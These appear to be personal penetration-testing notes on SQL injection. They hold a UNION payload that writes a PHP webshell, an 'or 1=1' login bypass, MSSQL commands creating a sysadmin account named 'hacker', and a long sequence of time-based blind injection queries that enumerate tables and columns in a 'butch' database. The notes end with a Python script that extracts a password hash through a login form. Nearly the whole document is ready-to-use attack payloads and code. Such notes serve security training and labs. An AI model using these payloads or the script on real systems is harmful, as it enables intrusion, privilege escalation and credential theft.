sqli: common

• postgres RCE

> ' UNION SELECT ("<?php echo passthru($_GET['cmd']);") INTO OUTFILE 'C:/xampp/htdocs/cmd.php'  -- -'

• common scenarios

# logic injection
> ' or '1'='1' --

# create user and add as sys admin
> create login hacker with password='password',default_database=[master]
> EXEC master..sp_addsrvrolemember @loginame = N'hacker', @rolename = N'sysadmin'

• Find database type

# Microsoft, MySQL
> SELECT @@version

# Oracle
> SELECT * FROM v$version

# PostgreSQL
> SELECT version()

Resources

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md
• https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
• https://github.com/codingo/OSCP-2/blob/master/Documents/SQL%20Injection%20Cheatsheet.md

time-based blind sqli

* check db name length
> admin1';IF len(db_name())=5 WAITFOR DELAY '00:00:5'--

* check string of db name
> admin1';IF substring(db_name(),1,1)='b' WAITFOR DELAY '00:00:5'--
`butch`

* get number of tables
> admin1';IF (select count(*) from information_schema.tables where TABLE_CATALOG='butch')=2 WAITFOR DELAY '00:00:5'--

* get first table name length
> admin1';IF (select top 1 len(table_name) from information_schema.tables where TABLE_CATALOG='butch')=5 WAITFOR DELAY '00:00:3'--

* get first table name
> admin1';IF (select top 1 table_name from information_schema.tables where TABLE_CATALOG='butch')='users' WAITFOR DELAY '00:00:3'--
`users`

* get number of cols in table
> admin1';IF (select count(column_name) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users')=3 WAITFOR DELAY '00:00:3'--
`3`

* get first column name length
> admin1';IF (select top 1 len(column_name) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users')=3 WAITFOR DELAY '00:00:3'--
`7`

* guess first column name
admin1';IF (select top 1 substring(column_name,1,1) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users')='a' WAITFOR DELAY '00:00:3'--
`user_id`

* guess second column name length
admin1';IF (select top 1 len(column_name) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users' and column_name!='user_id')=3 WAITFOR DELAY '00:00:3'--
`8`

* guess second column name
admin1';IF (select top 1 column_name from information_schema.columns where TABLE_CATALOG='butch' and table_name='users' and column_name!='user_id')='username' WAITFOR DELAY '00:00:3'--
`username`

* guess third column anem length
> admin1';IF (select top 1 len(column_name) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users' and column_name!='user_id' and column_name!='username')=3 WAITFOR DELAY '00:00:3'--
`13`

* guess third column name
admin1';IF (select top 1 substring(column_name,1,4) from information_schema.columns where TABLE_CATALOG='butch' and table_name='users' and column_name!='user_id' and column_name!='username')='user' WAITFOR DELAY '00:00:3'--
`password_hash`

* get number of rows in table
admin1';IF (select count(user_id) from butch.users)=1 WAITFOR DELAY '00:00:3'--
admin'; IF (select count(*) from users)>0 WAITFOR DELAY '00:00:3';--
1

* get first username lenth
> admin'; IF (select top 1 len(username) from users)=5 WAITFOR DELAY '00:00:3';--
`5`

* get first password_hash length
admin'; IF (select top 1 len(password_hash) from users)=64 WAITFOR DELAY '00:00:3';--
`64`

• Create a script to guess the password_hash based on the above

import requests
import time

url = 'http://<ip>/default.aspx'
s = requests.Session()

r = s.get(url)
# print(r.content)

hash_chars = "abcdef0123456789"

length = 1
value = ''
while length <=64:
    for i in hash_chars:
        test = value + i
        payload = "admin'; IF (select top 1 substring(password_hash,1," + str(length) + ") from users)='" + test + "' WAITFOR DELAY '00:00:3';--"
        data = {
            "__VIEWSTATE": "/wEPDwUKLTQ0NDEwMDQ5MmRksS3kT9xVa5WcaOExJczybgwm5ag61c1aSJauWk+MueM=",
            "__VIEWSTATEGENERATOR": "CA0B0334",
            "__EVENTVALIDATION": "/wEdAAQlk/dmKT4Sorxxd/xByuYXG8sL8VA5/m7gZ949JdB2tEE+RwHRw9AX2/IZO4gVaaKVeG6rrLts0M7XT7lmdcb6cSWj1jCV5XpbYX8jTlKxWkDqoWst7QvUmEJo+jB/FoQ=",
            "ctl00$ContentPlaceHolder1$UsernameTextBox": payload,
            "ctl00$ContentPlaceHolder1$PasswordTextBox": "",
            "ctl00$ContentPlaceHolder1$LoginButton": "Enter"
        }

        time_start = time.time()
        print(payload)
        s.post(url, data=data)
        time_end = time.time()
        elapse = time_end - time_start
        print(elapse)
        if elapse > 3:
            length += 1
            value += i
            print(value)